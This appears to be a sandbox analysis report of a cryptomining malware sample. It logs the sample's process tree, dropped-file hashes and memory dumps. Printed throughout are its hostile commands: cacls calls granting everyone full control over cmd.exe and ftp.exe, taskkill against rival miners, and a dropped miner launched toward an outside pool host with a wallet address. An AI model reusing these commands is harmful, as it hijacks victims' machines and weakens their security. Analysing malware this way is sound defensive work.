-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn32.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn32.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\CGlobalan.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemCvlsa\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cacls.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe -a ghostrider --donate-level 1 --max-cpu-usage 75 --url s.ooooooooooo.top:11433 --tls --user 14QUg7ycnWmVqfcmvuwYofsoTX4d2FuPk2.1114c -p x -k >C:\Users\Admin\AppData\Local\Temp\CPU_log.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeC:\Users\Admin\AppData\Local\Temp\sqlageatc.exe -a ghostrider --donate-level 1 --max-cpu-usage 75 --url s.ooooooooooo.top:11433 --tls --user 14QUg7ycnWmVqfcmvuwYofsoTX4d2FuPk2.1114c -p x -k3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cacls.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g everyone:f1⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempUpdate2.batFilesize
32KB
MD5ec3fa33874b842d0a549688a2ca7723a
SHA17cd48ada26369a3d100ee526717571c5b5b86566
SHA25664a049cf96b48bf4d48945530e2cd4a150d8aac45617cedf986466983169f8aa
SHA512260bf2d6ede6a990c187ff9f6cb768bcadb4be5a1d6676ce3cf318638e4edf251446e061d83d65ab8cfe847301da837c8e880a19383cfb4b5bf06c5a9fa28d61
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeFilesize
7.8MB
MD5511b1f4ee364d62bcc8fe33796b717b1
SHA1b8381cab13176fcc5f694e8738da49d56ccfdc1f
SHA256add5ee62fa476f69934dd58d0753ec755696ef7f75e516b62dacf74c47100d5d
SHA512022139cabb6c930edb44c058fc1dd37857d1cd53b63c261a3596e9b01587a701b5a52731fec7797f1fd6872eb23b7ef03760a48fade83183c4d560fa8fec1bb3
-
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exeFilesize
7.8MB
MD5511b1f4ee364d62bcc8fe33796b717b1
SHA1b8381cab13176fcc5f694e8738da49d56ccfdc1f
SHA256add5ee62fa476f69934dd58d0753ec755696ef7f75e516b62dacf74c47100d5d
SHA512022139cabb6c930edb44c058fc1dd37857d1cd53b63c261a3596e9b01587a701b5a52731fec7797f1fd6872eb23b7ef03760a48fade83183c4d560fa8fec1bb3
-
memory/456-183-0x0000000000000000-mapping.dmp
-
memory/528-139-0x0000000000000000-mapping.dmp
-
memory/680-159-0x0000000000000000-mapping.dmp
-
memory/800-132-0x0000000000400000-0x0000000000561000-memory.dmpFilesize
1.4MB
-
memory/800-133-0x00000000023A0000-0x00000000023AB000-memory.dmpFilesize
44KB
-
memory/800-134-0x00000000023A0000-0x00000000023AB000-memory.dmpFilesize
44KB
-
memory/800-199-0x0000000000400000-0x0000000000561000-memory.dmpFilesize
1.4MB
-
memory/980-189-0x0000000000000000-mapping.dmp
-
memory/1100-193-0x0000000000000000-mapping.dmp
-
memory/1184-185-0x0000000000000000-mapping.dmp
-
memory/1248-135-0x0000000000000000-mapping.dmp
-
memory/1256-169-0x0000000000000000-mapping.dmp
-
memory/1348-137-0x0000000000000000-mapping.dmp
-
memory/1472-194-0x0000000000000000-mapping.dmp
-
memory/1816-138-0x0000000000000000-mapping.dmp
-
memory/1852-142-0x0000000000000000-mapping.dmp
-
memory/1880-141-0x0000000000000000-mapping.dmp
-
memory/1888-163-0x0000000000000000-mapping.dmp
-
memory/2040-145-0x0000000000000000-mapping.dmp
-
memory/2188-181-0x0000000000000000-mapping.dmp
-
memory/2224-177-0x0000000000000000-mapping.dmp
-
memory/2452-149-0x0000000000000000-mapping.dmp
-
memory/2504-151-0x0000000000000000-mapping.dmp
-
memory/2556-190-0x0000000000000000-mapping.dmp
-
memory/2660-184-0x0000000000000000-mapping.dmp
-
memory/2744-164-0x0000000000000000-mapping.dmp
-
memory/3024-166-0x0000000000000000-mapping.dmp
-
memory/3100-167-0x0000000000000000-mapping.dmp
-
memory/3112-146-0x0000000000000000-mapping.dmp
-
memory/3212-178-0x0000000000000000-mapping.dmp
-
memory/3216-197-0x0000000000000000-mapping.dmp
-
memory/3248-147-0x0000000000000000-mapping.dmp
-
memory/3264-186-0x0000000000000000-mapping.dmp
-
memory/3472-144-0x0000000000000000-mapping.dmp
-
memory/3484-172-0x0000000000000000-mapping.dmp
-
memory/3520-165-0x0000000000000000-mapping.dmp
-
memory/3524-155-0x0000000000000000-mapping.dmp
-
memory/3552-180-0x0000000000000000-mapping.dmp
-
memory/3592-182-0x0000000000000000-mapping.dmp
-
memory/3632-198-0x0000000000000000-mapping.dmp
-
memory/3740-160-0x0000000000000000-mapping.dmp
-
memory/3844-187-0x0000000000000000-mapping.dmp
-
memory/3896-154-0x0000000000000000-mapping.dmp
-
memory/3984-192-0x0000000000000000-mapping.dmp
-
memory/4068-173-0x0000000000000000-mapping.dmp
-
memory/4104-175-0x0000000000000000-mapping.dmp
-
memory/4108-140-0x0000000000000000-mapping.dmp
-
memory/4128-156-0x0000000000000000-mapping.dmp
-
memory/4144-188-0x0000000000000000-mapping.dmp
-
memory/4164-196-0x0000000000000000-mapping.dmp
-
memory/4256-195-0x0000000000000000-mapping.dmp
-
memory/4268-157-0x0000000000000000-mapping.dmp
-
memory/4276-174-0x0000000000000000-mapping.dmp
-
memory/4308-179-0x0000000000000000-mapping.dmp
-
memory/4344-170-0x0000000000000000-mapping.dmp
-
memory/4368-168-0x0000000000000000-mapping.dmp
-
memory/4372-143-0x0000000000000000-mapping.dmp
-
memory/4444-161-0x0000000000000000-mapping.dmp
-
memory/4752-148-0x0000000000000000-mapping.dmp
-
memory/4756-171-0x0000000000000000-mapping.dmp
-
memory/4764-152-0x0000000000000000-mapping.dmp
-
memory/4768-136-0x0000000000000000-mapping.dmp
-
memory/4804-162-0x0000000000000000-mapping.dmp
-
memory/4876-153-0x0000000000000000-mapping.dmp
-
memory/4968-176-0x0000000000000000-mapping.dmp
-
memory/5060-158-0x0000000000000000-mapping.dmp
-
memory/5080-150-0x0000000000000000-mapping.dmp
-
memory/5104-191-0x0000000000000000-mapping.dmp
-
memory/5748-203-0x000002246DE30000-0x000002246DE50000-memory.dmpFilesize
128KB